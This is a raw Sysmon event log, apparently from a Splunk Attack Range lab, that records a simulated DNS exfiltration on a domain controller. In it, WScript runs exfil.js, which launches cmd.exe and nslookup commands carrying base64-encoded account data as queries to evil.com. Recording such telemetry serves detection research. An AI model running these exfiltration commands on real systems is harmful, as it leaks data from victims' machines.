10341000x8000000000000000203145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.162{2E1864BB-17C9-629A-8B41-000000005F02}52167172C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-8D41-000000005F02}2616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.172{2E1864BB-17C9-629A-8D41-000000005F02}2616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-8B41-000000005F02}5216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwif.tmp 2>&1 10341000x8000000000000000203140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.143{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-8C41-000000005F02}1104C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.143{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-8C41-000000005F02}1104C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.124{2E1864BB-17C9-629A-8C41-000000005F02}11048124C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-8B41-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.124{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8C41-000000005F02}1104C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8B41-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.108{2E1864BB-17A1-629A-783D-000000005F02}55526036C:\Windows\System32\WScript.exe{2E1864BB-17C9-629A-8B41-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.111{2E1864BB-17C9-629A-8B41-000000005F02}5216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwif.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.093{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsqy.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-17C8-629A-8941-000000005F02}50485152C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-8A41-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-8A41-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.046{2E1864BB-17C8-629A-8841-000000005F02}59767480C:\Windows\system32\cmd.exe{2E1864BB-17C9-629A-8A41-000000005F02}7080C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.049{2E1864BB-17C9-629A-8A41-000000005F02}7080C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-8841-000000005F02}5976C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgsqy.tmp 2>&1 10341000x8000000000000000203120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.993{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8941-000000005F02}5048C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.993{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-8941-000000005F02}5048C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.993{2E1864BB-17C8-629A-8941-000000005F02}50485152C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-8841-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043952Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:41.547{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67780CFFF7F914EF626C900C2C00FCFB,SHA256=60CE7AD0BC6A4B97ADCA79D8D1E1328F1F540D27CABF5B5ADDB4C20E9EC04D69,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043951Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:39.672{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52327-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000203618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.991{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljsfkimr.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.938{2E1864BB-17CA-629A-B941-000000005F02}58285012C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-BA41-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 